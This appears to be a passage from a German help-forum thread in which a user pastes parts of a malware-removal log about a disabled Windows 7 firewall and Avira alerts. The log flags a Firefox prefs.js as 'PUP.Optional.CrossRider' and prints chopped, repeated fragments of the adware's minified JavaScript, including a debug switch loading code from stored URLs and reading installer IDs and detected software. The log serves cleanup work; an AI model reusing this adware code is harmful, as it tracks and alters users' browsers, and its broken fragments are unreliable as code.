q;_callbackFunc=n(o);if(document.location.href==\&quot;chrome://crossriderapp\&quot;+appAPI.appID+\&quot;/content/background.html\&quot;.toLowerCase()){q=unsafeWindow.listen(_callbackFunc)}else{var p=m();if(!e()){p=document}q=FFInternal.message.listenOrigin(_callbackFunc,p);jQuery(window).unload(function(){if(e()){appAPI.message.removeListener(q)}else{FFInternal.message.removeListenerOrigin(q)}})}return q};l.removeListener=function(p){if(document.location.href==\&quot;chrome://crossriderapp\&quot;+appAPI.appID+\&quot;/content/background.html\&quot;.toLowerCase()){return unsafeWindow.removeListen(p)}else{var o=m();if(o){return FFInternal.message.removeListenerOrigin(p,o)}}};l.toActiveTab=function(p,o){var q=j?appAPI.JSON.stringify(p):p;if(typeof q!==\&quot;undefined\&quot;){return FFInternal.message.toActiveTab(q,o)}};l.toAllTabs=function(p,o){var q=j?appAPI.JSON.stringify(p):p;if(typeof q!==\&quot;undefined\&quot;){return FFInternal.message.toAllTabs(q,o)}};l.toBackground=function(o){var p=j?appAPI.JSON.stringify(o):o;if(typeof p!==\&quot;undefined\&quot;){return FFInternal.message.toBackground(p)}};l.toCurrentTabIframes=function(o){var p=j?appAPI.JSON.stringify(o):o;if(typeof p!==\&quot;undefined\&quot;){return FFInternal.message.toCurrentTabIframes(p,document)}};l.toCurrentTabWindow=function(o){var p=j?appAPI.JSON.stringify(o):o;if(typeof p!==\&quot;undefined\&quot;){return FFInternal.message.toCurrentTabWindow(p,document)}};l.toAllOtherTabs=function(p,o){var q=j?appAPI.JSON.stringify(p):p;if(typeof q!==\&quot;undefined\&quot;){return FFInternal.message.toAllOtherTabs(q,o)}}})(f.prototype);function h(e){this._DBObject=e}(function(e){function n(o){var q;try{q=escape(appAPI.JSON.stringify(o))}catch(p){q=undefined}return q}function m(q){var o;try{o=appAPI.JSON.parse(unescape(q))}catch(p){o=undefined}return o}function l(o){return function(q){var p=o;var r=m(q);if(r){p(r)}}}e.set=function(q,r,p,s){var o=j?n(r):r;if(typeof o!==\&quot;undefined\&quot;){return this._DBObject.set(q,o,p,s)}};e.get=function(o,p){if(!j){return this._DBObject.get(o,p)}if(p){this._DBObject.get(o,l(p))}else{return m(this._DBObject.get(o))}};e.list=function(p){if(!j){return this._DBObject.list(p)}if(p){this._DBObject.list(l(p))}else{var o=this._DBObject.list();return m(this._DBObject.list())}};e.getList=function(o){if(!j){return this._DBObject.getList(o)}if(typeof o==\&quot;function\&quot;){this._DBObject.getList(function(p){p=appAPI.JSON.parse(p);o(p)})}else{dbEntriesResultArray=m(this._DBObject.getList());return dbEntriesResultArray}};e.getExpiration=function(o,p){if(!j){return this._DBObject.getExpiration(o,p)}if(typeof p==\&quot;function\&quot;){this._DBObject.getExpiration(o,function(q){p(new Date(q))})}else{return new Date(this._DBObject.getExpiration(o))}};e.updateExpiration=function(p,o,q){return this._DBObject.updateExpiration(p,o,q)};e.removeExpired=function(o){return this._DBObject.removeExpired(o)};e.remove=function(o,p){return this._DBObject.remove(o,p)};e.removeAll=function(o){return this._DBObject.removeAll(o)};e.setFromRemote=function(r,q,o,p,s){return this._DBObject.setFromRemote(r,q,o,p,s)}})(h.prototype);function k(){this.turnOn=function(l){if(typeof(l)===\&quot;undefined\&quot;||l===null){return false}if(typeof(l.userCode)!==\&quot;string\&quot;){return false}if(typeof(l.backgroundCode)!==\&quot;string\&quot;){return false}var m=l.userCode;var e=l.backgroundCode;FFInternal.prefs.setBoolPref(\&quot;debug\&quot;,true);FFInternal.prefs.setIntPref(\&quot;debug_app\&quot;,appAPI.appID);FFInternal.prefs.setCharPref(\&quot;debug_url\&quot;,m);FFInternal.prefs.setCharPref(\&quot;debug_background_url\&quot;,e);FFInternal.background.reload();return true};this.turnOff=function(){FFInternal.prefs.setBoolPref(\&quot;debug\&quot;,false)};this.isDebugMode=function(){return FFInternal.prefs.getBoolPref(\&quot;debug\&quot;)};this.getDebugUrl=function(){var e=\&quot;\&quot;;if(FFInternal.prefs.hasValue(\&quot;debug_url\&quot;)){e=FFInternal.prefs.getCharPref(\&quot;debug_url\&quot;)}var l=\&quot;\&quot;;if(FFInternal.prefs.hasValue(\&quot;debug_background_url\&quot;)){l=FFInternal.prefs.getCharPref(\&quot;debug_background_url\&quot;)}return{userCode:e,backgroundCode:l}};return this}function c(l,e){if(typeof l===\&quot;undefined\&quot;||typeof e===\&quot;undefined\&quot;){return}if(typeof l.firefox===\&quot;undefined\&quot;){return}e.firefox={};e.firefox.notification=l.firefox.notification;e.firefox.omnibox=l.firefox.omnibox;e.firefox.browserAction=l.firefox.browserAction;e.browserAction=FFInternal.browserAction}function b(l,e){if(typeof l===\&quot;undefined\&quot;||typeof e===\&quot;undefined\&quot;){return}if(typeof l.internal===\&quot;undefined\&quot;){return}if(typeof(e.installer)===\&quot;undefined\&quot;){e.installer={}}e.installer.getIds=function(){return l.internal.db.get(\&quot;InstallerIdentifiers\&quot;)};e.installer.getUserId=function(){var m=appAPI.installer.getIds();if(m!==null){return m.installer_bic}return null};e.installer.getInstalledSoftware=function(){return l.internal.db.get(\&quot;SoftwareDetected\&quot;)}}function i(l,e){if(typeof l===\&quot;undefined\&quot;||typeof e===\&quot;undefined\&quot;){return}if(e.isBackground){e.onRequest=function(m,n){l.onRequest(m,n)};e.onBeforeNavigate=function(m,n){l.onBeforeNavigate(m,n)};if(typeof l.webRequest!==\&quot;undefined\&quot;){e.webRequest=l.webRequest}if(typeof l.tabs!==\&quot;undefined\&quot;){e.tabs=l.tabs.toAppAPIPublicObj()}if(typeof l.contextMenu!==\&quot;undefined\&quot;){e.contextMenu=l.contextMenu}}}if(typeof(appAPI)==\&quot;undefined\&quot;){appAPI={}}var a=FFInternal.appID+\&quot;.\&quot;;appAPI.appID=FFInternal.appID;appAPI.version=FFInternal.version;appAPI.platform=FFInternal.platform;appAPI.cr_version=FFInternal.cr_version;b</baddata><gooddata></gooddata><hash>6277c9d8008b44f243806733956f59a7</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>I.platform=FFInternal.platform;appAPI.cr_version=FFInternal.cr_version;b(FFInter</baddata><gooddata></gooddata><hash>bd1c7a270e7d270f7a490b8f4db7d62a</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>is file.
 *
 * If you make changes to this file while the application </baddata><gooddata></gooddata><hash>e2f7029ff69592a4a122dac0fc0839c7</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata> edit this file.
 *
 * If you make changes to this file while the application is running,
 * the changes will be overwritten when the application exits.
 *
 * To make a manual change to preferences, you can visit the URL about:config
 */
         

Alt 07.12.2015, 09:18   #11
Polte
 
WIN 7 Firewall nicht aktivierbar/Avira meldet Funde - Standard

WIN 7 Firewall nicht aktivierbar/Avira meldet Funde



Teil 6

Code:
ATTFilter
user_pref(&quot;accessibility.typeaheadfind.flashBar&quot;, 0);
user_pref(&quot;app.update.lastUpdateTime.addon-background-update-timer&quot;, 1449326518);
user_pref(&quot;app.update.lastUpdateTime.background-update-timer&quot;, 1449310788);
user_pref(&quot;app.update.lastUpdateTime.blocklist-background-update-timer&quot;, 1449324908);
user_pref(&quot;app.update.lastUpdateTime.browser-cleanup-thumbnails&quot;, 1449353054);
user_pref(&quot;app.update.lastUpdateTime.experiments-update-timer&quot;, 1449326398);
user_pref(&quot;app.update.lastUpdateTime.search-engine-update-timer&quot;, 1449343906);
user_pref(&quot;app.update.lastUpdateTime.xpi-signature-verification&quot;, 1449326278);
user_pref(&quot;app.update.migrated.updateDir&quot;, true);
user_pref(&quot;browser.bookmarks.restore_default_bookmarks&quot;, false);
user_pref(&quot;browser.cache.disk.capacity&quot;, 0);
user_pref(&quot;browser.cache.disk.filesystem_reported&quot;, 1);
user_pref(&quot;browser.cache.disk.smart_size.enabled&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size.first_run&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size.use_old_max&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size_cached_value&quot;, 358400);
user_pref(&quot;browser.cache.frecency_experiment&quot;, 3);
user_pref(&quot;browser.customizemode.tip0.shown&quot;, true);
user_pref(&quot;browser.download.importedFromSqlite&quot;, true);
user_pref(&quot;browser.download.manager.retention&quot;, 0);
user_pref(&quot;browser.download.panel.firstSessionCompleted&quot;, true);
user_pref(&quot;browser.download.panel.shown&quot;, true);
user_pref(&quot;browser.download.save_converter_index&quot;, 0);
user_pref(&quot;browser.feeds.showFirstRunUI&quot;, false);
user_pref(&quot;browser.formfill.enable&quot;, false);
user_pref(&quot;browser.hotfix.v20150225.01.complete&quot;, true);
user_pref(&quot;browser.migration.version&quot;, 30);
user_pref(&quot;browser.newtabpage.blocked&quot;, &quot;{\&quot;IoDyuodwFMMBuEJuNT5LZA==\&quot;:1,\&quot;2/Jajwm5xLUkQYEtqKKJuA==\&quot;:1,\&quot;5XYqhwwFl8Nm3aa/bzTEXA==\&quot;:1,\&quot;XN0gzX5CZdmIYOEKmV0GVA==\&quot;:1,\&quot;Fxqb5qY5liKaWb0nxW1VIQ==\&quot;:1,\&quot;5dPX2t2Xtq7V1dnRJu5irg==\&quot;:1,\&quot;fN+l9WzvM5iUCIvEhEOYEQ==\&quot;:1,\&quot;JsXUxU9t1wOIlkZ9TyVEsg==\&quot;:1,\&quot;er4xCOhSuEoh6/Q+OsASGw==\&quot;:1,\&quot;ewuiteJbUq/F9Zuy9EJhMA==\&quot;:1}&quot;);
user_pref(&quot;browser.newtabpage.enhanced&quot;, true);
user_pref(&quot;browser.newtabpage.introShown&quot;, true);
user_pref(&quot;browser.newtabpage.storageVersion&quot;, 1);
user_pref(&quot;browser.pagethumbnails.storage_version&quot;, 3);
user_pref(&quot;browser.places.smartBookmarksVersion&quot;, 7);
user_pref(&quot;browser.preferences.advanced.selectedTabIndex&quot;, 3);
user_pref(&quot;browser.privatebrowsing.autostart&quot;, true);
user_pref(&quot;browser.reader.detectedFirstArticle&quot;, true);
user_pref(&quot;browser.rights.3.shown&quot;, true);
user_pref(&quot;browser.search.countryCode&quot;, &quot;DE&quot;);
user_pref(&quot;browser.search.isUS&quot;, false);
user_pref(&quot;browser.search.region&quot;, &quot;DE&quot;);
user_pref(&quot;browser.search.selectedEngine&quot;, &quot;Google&quot;);
user_pref(&quot;browser.sessionstore.upgradeBackup.latestBuildID&quot;, &quot;20140923175406&quot;);
user_pref(&quot;browser.shell.mostRecentDateSetAsDefault&quot;, &quot;1449386344&quot;);
user_pref(&quot;browser.slowStartup.averageTime&quot;, 0);
user_pref(&quot;browser.slowStartup.notificationDisabled&quot;, true);
user_pref(&quot;browser.slowStartup.samples&quot;, 0);
user_pref(&quot;browser.startup.homepage&quot;, &quot;www.google.de&quot;);
user_pref(&quot;browser.startup.homepage_override.buildID&quot;, &quot;20151029151421&quot;);
user_pref(&quot;browser.startup.homepage_override.mstone&quot;, &quot;42.0&quot;);
user_pref(&quot;browser.syncPromoViewsLeftMap&quot;, &quot;{\&quot;bookmarks\&quot;:4}&quot;);
user_pref(&quot;browser.tabs.warnOnClose&quot;, false);
user_pref(&quot;browser.taskbar.lastgroupid&quot;, &quot;E7CF176E110C211B&quot;);
user_pref(&quot;brow</baddata><gooddata></gooddata><hash>ddfc5e4399f2092d17ac257554b0a25e</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>ref(&quot;browser.taskbar.lastgroupid&quot;, &quot;E7CF176E110C211B&quot;);
user_pref(&quot;browser.too</baddata><gooddata></gooddata><hash>f5e4b6ebed9ede58843f5b3fee169769</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>his file.
 *
 * If you make changes to this file while the application</baddata><gooddata></gooddata><hash>5683564b9bf08ea8ba091f7bb1537888</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata> edit this file.
 *
 * If you make changes to this file while the application is running,
 * the changes will be overwritten when the application exits.
 *
 * To make a manual change to preferences, you can visit the URL about:config
 */

user_pref(&quot;accessibility.typeaheadfind.flashBar&quot;, 0);
user_pref(&quot;app.update.lastUpdateTime.addon-background-update-timer&quot;, 1449326518);
user_pref(&quot;app.update.lastUpdateTime.background-update-timer&quot;, 1449310788);
user_pref(&quot;app.update.lastUpdateTime.blocklist-background-update-timer&quot;, 1449324908);
user_pref(&quot;app.update.lastUpdateTime.browser-cleanup-thumbnails&quot;, 1449353054);
user_pref(&quot;app.update.lastUpdateTime.experiments-update-timer&quot;, 1449326398);
user_pref(&quot;app.update.lastUpdateTime.search-engine-update-timer&quot;, 1449343906);
user_pref(&quot;app.update.lastUpdateTime.xpi-signature-verification&quot;, 1449326278);
user_pref(&quot;app.update.migrated.updateDir&quot;, true);
user_pref(&quot;browser.bookmarks.restore_default_bookmarks&quot;, false);
user_pref(&quot;browser.cache.disk.capacity&quot;, 0);
user_pref(&quot;browser.cache.disk.filesystem_reported&quot;, 1);
user_pref(&quot;browser.cache.disk.smart_size.enabled&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size.first_run&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size.use_old_max&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size_cached_value&quot;, 358400);
user_pref(&quot;browser.cache.frecency_experiment&quot;, 3);
user_pref(&quot;browser.customizemode.tip0.shown&quot;, true);
user_pref(&quot;browser.download.importedFromSqlite&quot;, true);
user_pref(&quot;browser.download.manager.retention&quot;, 0);
user_pref(&quot;browser.download.panel.firstSessionCompleted&quot;, true);
user_pref(&quot;browser.download.panel.shown&quot;, true);
user_pref(&quot;browser.download.save_converter_index&quot;, 0);
user_pref(&quot;browser.feeds.showFirstRunUI&quot;, false);
user_pref(&quot;browser.formfill.enable&quot;, false);
user_pref(&quot;browser.hotfix.v20150225.01.complete&quot;, true);
user_pref(&quot;browser.migration.version&quot;, 30);
user_pref(&quot;browser.newtabpage.blocked&quot;, &quot;{\&quot;IoDyuodwFMMBuEJuNT5LZA==\&quot;:1,\&quot;2/Jajwm5xLUkQYEtqKKJuA==\&quot;:1,\&quot;5XYqhwwFl8Nm3aa/bzTEXA==\&quot;:1,\&quot;XN0gzX5CZdmIYOEKmV0GVA==\&quot;:1,\&quot;Fxqb5qY5liKaWb0nxW1VIQ==\&quot;:1,\&quot;5dPX2t2Xtq7V1dnRJu5irg==\&quot;:1,\&quot;fN+l9WzvM5iUCIvEhEOYEQ==\&quot;:1,\&quot;JsXUxU9t1wOIlkZ9TyVEsg==\&quot;:1,\&quot;er4xCOhSuEoh6/Q+OsASGw==\&quot;:1,\&quot;ewuiteJbUq/F9Zuy9EJhMA==\&quot;:1}&quot;);
user_pref(&quot;browser.newtabpage.enhanced&quot;, true);
user_pref(&quot;browser.newtabpage.introShown&quot;, true);
user_pref(&quot;browser.newtabpage.storageVersion&quot;, 1);
user_pref(&quot;browser.pagethumbnails.storage_version&quot;, 3);
user_pref(&quot;browser.places.smartBookmarksVersion&quot;, 7);
user_pref(&quot;browser.preferences.advanced.selectedTabIndex&quot;, 3);
user_pref(&quot;browser.privatebrowsing.autostart&quot;, true);
user_pref(&quot;browser.reader.detectedFirstArticle&quot;, true);
user_pref(&quot;browser.rights.3.shown&quot;, true);
user_pref(&quot;browser.search.countryCode&quot;, &quot;DE&quot;);
user_pref(&quot;browser.search.isUS&quot;, false);
user_pref(&quot;browser.search.region&quot;, &quot;DE&quot;);
user_pref(&quot;browser.search.selectedEngine&quot;, &quot;Google&quot;);
user_pref(&quot;browser.sessionstore.upgradeBackup.latestBuildID&quot;, &quot;20140923175406&quot;);
user_pref(&quot;browser.shell.mostRecentDateSetAsDefault&quot;, &quot;1449386344&quot;);
user_pref(&quot;browser.slowStartup.averageTime&quot;, 0);
user_pref(&quot;browser.slowStartup.notificationDisabled&quot;, true);
user_pref(&quot;browser.slowStartup.samples&quot;, 0);
user_pref(&quot;browser.startup.homepage&quot;, &quot;www.google.de&quot;);
user_pref(&quot;browser.startup.homepage_override.buildID&quot;, &quot;20151029151421&quot;);
user_pref(&quot;browser.startup.homepage_override.mstone&quot;, &quot;42.0&quot;);
user_pref(&quot;browser.syncPromoViewsLeftMap&quot;, &quot;{\&quot;bookmarks\&quot;:4}&quot;);
user_pref(&quot;browser.tabs.warnOnClose&quot;, false);
user_pref(&quot;browser.taskbar.lastgroupid&quot;, &quot;E7CF176E110C211B&quot;);
user_pref(&quot;browser.toolbarbuttons.introduced.pocket-button&quot;, true);
user_pref(&quot;browser.uiCustomization.state&quot;, &quot;{\&quot;placements\&quot;:{\&quot;PanelUI-contents\&quot;:[\&quot;edit-controls\&quot;,\&quot;zoom-controls\&quot;,\&quot;new-window-button\&quot;,\&quot;privatebrowsing-button\&quot;,\&quot;save-page-button\&quot;,\&quot;print-button\&quot;,\&quot;history-panelmenu\&quot;,\&quot;fullscreen-button\&quot;,\&quot;find-button\&quot;,\&quot;add-ons-button\&quot;,\&quot;developer-button\&quot;,\&quot;preferences-button\&quot;],\&quot;addon-bar\&quot;:[\&quot;addonbar-closebutton\&quot;,\&quot;customizableui-special-spring1\&quot;,\&quot;status-bar\&quot;],\&quot;PersonalToolbar\&quot;:[\&quot;personal-bookmarks\&quot;],\&quot;nav-bar\&quot;:[\&quot;unified-back-forward-button\&quot;,\&quot;urlbar-container\&quot;,\&quot;reload-button\&quot;,\&quot;stop-button\&quot;,\&quot;search-container\&quot;,\&quot;webrtc-status-button\&quot;,\&quot;bookmarks-menu-button\&quot;,\&quot;pocket-button\&quot;,\&quot;downloads-button\&quot;,\&quot;home-button\&quot;,\&quot;window-controls\&quot;,\&quot;social-share-button\&quot;,\&quot;loop-button-throttled\&quot;,\&quot;loop-button\&quot;],\&quot;TabsToolbar\&quot;:[\&quot;tabbrowser-tabs\&quot;,\&quot;new-tab-button\&quot;,\&quot;alltabs-button\&quot;,\&quot;tabs-closebutton\&quot;],\&quot;toolbar-menubar\&quot;:[\&quot;menubar-items\&quot;]},\&quot;seen\&quot;:[],\&quot;dirtyAreaCache\&quot;:[\&quot;addon-bar\&quot;,\&quot;PersonalToolbar\&quot;,\&quot;nav-bar\&quot;,\&quot;TabsToolbar\&quot;,\&quot;toolbar-menubar\&quot;,\&quot;PanelUI-contents\&quot;],\&quot;currentVersion\&quot;:4,\&quot;newElementCount\&quot;:1}&quot;);
user_pref(&quot;browser.uitour.whitelist.add.260&quot;, &quot;&quot;);
user_pref(&quot;browser.uitour.whitelist.add.340&quot;, &quot;&quot;);
user_pref(&quot;browser.urlbar.autocomplete.enabled&quot;, false);
user_pref(&quot;browser.urlbar.suggest.bookmark&quot;, false);
user_pref(&quot;browser.urlbar.suggest.history&quot;, false);
user_pref(&quot;browser.urlbar.suggest.openpage&quot;, false);
user_pref(&quot;datareporting.healthreport.lastDataSubmissionFailureTime&quot;, &quot;1435040802954&quot;);
user_pref(&quot;datareporting.healthreport.lastDataSubmissionRequestedTime&quot;, &quot;1449324463516&quot;);
user_pref(&quot;datareporting.healthreport.lastDataSubmissionSuccessfulTime&quot;, &quot;1449324465597&quot;);
user_pref(&quot;datareporting.healthreport.nextDataSubmissionTime&quot;, &quot;1449410865597&quot;);
user_pref(&quot;datareporting.healthreport.service.firstRun&quot;, true);
user_pref(&quot;datareporting.policy.dataSubmissionPolicyAcceptedVersion&quot;, 2);
user_pref(&quot;datareporting.policy.dataSubmissionPolicyNotifiedTime&quot;, &quot;1417596264603&quot;);
user_pref(&quot;datareporting.policy.firstRunTime&quot;, &quot;1365871572512&quot;);
user_pref(&quot;datareporting.sessions.current.activeTicks&quot;, 7);
user_pref(&quot;datareporting.sessions.current.firstPaint&quot;, 26881);
user_pref(&quot;datareporting.sessions.current.main&quot;, 17238);
user_pref(&quot;datareporting.sessions.current.sessionRestored&quot;, 28445);
user_pref(&quot;datareporting.sessions.current.startTime&quot;, &quot;1449386316097&quot;);
user_pref(&quot;datareporting.sessions.current.tot</baddata><gooddata></gooddata><hash>77628b16eaa10a2c467d1b7fe51f649c</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>tTime&quot;, &quot;1449386316097&quot;);
user_pref(&quot;datareporting.sessions.current.totalTime&quot;, 56</baddata><gooddata></gooddata><hash>b623dcc5385396a0ebd8d7c3768e31cf</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>file.
 *
 * If you make changes to this file while the application is </baddata><gooddata></gooddata><hash>c415b7ea55363204fcc72d6d59abe41c</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata> edit this file.
 *
 * If you make changes to this file while the application is running,
 * the changes will be overwritten when the application exits.
 *
 * To make a manual change to preferences, you can visit the URL about:config
 */
         

Alt 07.12.2015, 09:19   #12
Polte
 
WIN 7 Firewall nicht aktivierbar/Avira meldet Funde - Standard

WIN 7 Firewall nicht aktivierbar/Avira meldet Funde



Teil 7

Code:
ATTFilter
user_pref(&quot;accessibility.typeaheadfind.flashBar&quot;, 0);
user_pref(&quot;app.update.lastUpdateTime.addon-background-update-timer&quot;, 1449326518);
user_pref(&quot;app.update.lastUpdateTime.background-update-timer&quot;, 1449310788);
user_pref(&quot;app.update.lastUpdateTime.blocklist-background-update-timer&quot;, 1449324908);
user_pref(&quot;app.update.lastUpdateTime.browser-cleanup-thumbna</baddata><gooddata></gooddata><hash>31a85b46d7b4251133909208c242d030</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>49324908);
user_pref(&quot;app.update.lastUpdateTime.browser-cleanup-thumbnails&quot;, 1449353</baddata><gooddata></gooddata><hash>03d6d8c9f794c76f9c27b5e5bd47936d</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>le.
 *
 * If you make changes to this file while the application is ru</baddata><gooddata></gooddata><hash>6277524f038836005370108a62a2ee12</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata> edit this file.
 *
 * If you make changes to this file while the application is running,
 * the changes will be overwritten when the application exits.
 *
 * To make a manual change to preferences, you can visit the URL about:config
 */

user_pref(&quot;accessibility.typeaheadfind.flashBar&quot;, 0);
user_pref(&quot;app.update.lastUpdateTime.addon-background-update-timer&quot;, 1449326518);
user_pref(&quot;app.update.lastUpdateTime.background-update-timer&quot;, 1449310788);
user_pref(&quot;app.update.lastUpdateTime.blocklist-background-update-timer&quot;, 1449324908);
user_pref(&quot;app.update.lastUpdateTime.browser-cleanup-thumbnails&quot;, 1449353054);
user_pref(&quot;app.update.lastUpdateTime.experiments-update-timer&quot;, 1449326398);
user_pref(&quot;app.update.lastUpdateTime.search-engine-update-timer&quot;, 1449343906);
user_pref(&quot;app.update.lastUpdateTime.xpi-signature-verification&quot;, 1449326278);
user_pref(&quot;app.update.migrated.updateDir&quot;, true);
user_pref(&quot;browser.bookmarks.restore_default_bookmarks&quot;, false);
user_pref(&quot;browser.cache.disk.capacity&quot;, 0);
user_pref(&quot;browser.cache.disk.filesystem_reported&quot;, 1);
user_pref(&quot;browser.cache.disk.smart_size.enabled&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size.first_run&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size.use_old_max&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size_cached_value&quot;, 358400);
user_pref(&quot;browser.cache.frecency_experiment&quot;, 3);
user_pref(&quot;browser.customizemode.tip0.shown&quot;, true);
user_pref(&quot;browser.download.importedFromSqlite&quot;, true);
user_pref(&quot;browser.download.manager.retention&quot;, 0);
user_pref(&quot;browser.download.panel.firstSessionCompleted&quot;, true);
user_pref(&quot;browser.download.panel.shown&quot;, true);
user_pref(&quot;browser.download.save_converter_index&quot;, 0);
user_pref(&quot;browser.feeds.showFirstRunUI&quot;, false);
user_pref(&quot;browser.formfill.enable&quot;, false);
user_pref(&quot;browser.hotfix.v20150225.01.complete&quot;, true);
user_pref(&quot;browser.migration.version&quot;, 30);
user_pref(&quot;browser.newtabpage.blocked&quot;, &quot;{\&quot;IoDyuodwFMMBuEJuNT5LZA==\&quot;:1,\&quot;2/Jajwm5xLUkQYEtqKKJuA==\&quot;:1,\&quot;5XYqhwwFl8Nm3aa/bzTEXA==\&quot;:1,\&quot;XN0gzX5CZdmIYOEKmV0GVA==\&quot;:1,\&quot;Fxqb5qY5liKaWb0nxW1VIQ==\&quot;:1,\&quot;5dPX2t2Xtq7V1dnRJu5irg==\&quot;:1,\&quot;fN+l9WzvM5iUCIvEhEOYEQ==\&quot;:1,\&quot;JsXUxU9t1wOIlkZ9TyVEsg==\&quot;:1,\&quot;er4xCOhSuEoh6/Q+OsASGw==\&quot;:1,\&quot;ewuiteJbUq/F9Zuy9EJhMA==\&quot;:1}&quot;);
user_pref(&quot;browser.newtabpage.enhanced&quot;, true);
user_pref(&quot;browser.newtabpage.introShown&quot;, true);
user_pref(&quot;browser.newtabpage.storageVersion&quot;, 1);
user_pref(&quot;browser.pagethumbnails.storage_version&quot;, 3);
user_pref(&quot;browser.places.smartBookmarksVersion&quot;, 7);
user_pref(&quot;browser.preferences.advanced.selectedTabIndex&quot;, 3);
user_pref(&quot;browser.privatebrowsing.autostart&quot;, true);
user_pref(&quot;browser.reader.detectedFirstArticle&quot;, true);
user_pref(&quot;browser.rights.3.shown&quot;, true);
user_pref(&quot;browser.search.countryCode&quot;, &quot;DE&quot;);
user_pref(&quot;browser.search.isUS&quot;, false);
user_pref(&quot;browser.search.region&quot;, &quot;DE&quot;);
user_pref(&quot;browser.search.selectedEngine&quot;, &quot;Google&quot;);
user_pref(&quot;browser.sessionstore.upgradeBackup.latestBuildID&quot;, &quot;20140923175406&quot;);
user_pref(&quot;browser.shell.mostRecentDateSetAsDefault&quot;, &quot;1449386344&quot;);
user_pref(&quot;browser.slowStartup.averageTime&quot;, 0);
user_pref(&quot;browser.slowStartup.notificationDisabled&quot;, true);
user_pref(&quot;browser.slowStartup.samples&quot;, 0);
user_pref(&quot;browser.startup.homepage&quot;, &quot;www.google.de&quot;);
user_pref(&quot;browser.startup.homepage_override.buildID&quot;, &quot;20151029151421&quot;);
user_pref(&quot;browser.startup.homepage_override.mstone&quot;, &quot;42.0&quot;);
user_pref(&quot;browser.syncPromoViewsLeftMap&quot;, &quot;{\&quot;bookmarks\&quot;:4}&quot;);
user_pref(&quot;browser.tabs.warnOnClose&quot;, false);
user_pref(&quot;browser.taskbar.lastgroupid&quot;, &quot;E7CF176E110C211B&quot;);
user_pref(&quot;browser.toolbarbuttons.introduced.pocket-button&quot;, true);
user_pref(&quot;browser.uiCustomization.state&quot;, &quot;{\&quot;placements\&quot;:{\&quot;PanelUI-contents\&quot;:[\&quot;edit-controls\&quot;,\&quot;zoom-controls\&quot;,\&quot;new-window-button\&quot;,\&quot;privatebrowsing-button\&quot;,\&quot;save-page-button\&quot;,\&quot;print-button\&quot;,\&quot;history-panelmenu\&quot;,\&quot;fullscreen-button\&quot;,\&quot;find-button\&quot;,\&quot;add-ons-button\&quot;,\&quot;developer-button\&quot;,\&quot;preferences-button\&quot;],\&quot;addon-bar\&quot;:[\&quot;addonbar-closebutton\&quot;,\&quot;customizableui-special-spring1\&quot;,\&quot;status-bar\&quot;],\&quot;PersonalToolbar\&quot;:[\&quot;personal-bookmarks\&quot;],\&quot;nav-bar\&quot;:[\&quot;unified-back-forward-button\&quot;,\&quot;urlbar-container\&quot;,\&quot;reload-button\&quot;,\&quot;stop-button\&quot;,\&quot;search-container\&quot;,\&quot;webrtc-status-button\&quot;,\&quot;bookmarks-menu-button\&quot;,\&quot;pocket-button\&quot;,\&quot;downloads-button\&quot;,\&quot;home-button\&quot;,\&quot;window-controls\&quot;,\&quot;social-share-button\&quot;,\&quot;loop-button-throttled\&quot;,\&quot;loop-button\&quot;],\&quot;TabsToolbar\&quot;:[\&quot;tabbrowser-tabs\&quot;,\&quot;new-tab-button\&quot;,\&quot;alltabs-button\&quot;,\&quot;tabs-closebutton\&quot;],\&quot;toolbar-menubar\&quot;:[\&quot;menubar-items\&quot;]},\&quot;seen\&quot;:[],\&quot;dirtyAreaCache\&quot;:[\&quot;addon-bar\&quot;,\&quot;PersonalToolbar\&quot;,\&quot;nav-bar\&quot;,\&quot;TabsToolbar\&quot;,\&quot;toolbar-menubar\&quot;,\&quot;PanelUI-contents\&quot;],\&quot;currentVersion\&quot;:4,\&quot;newElementCount\&quot;:1}&quot;);
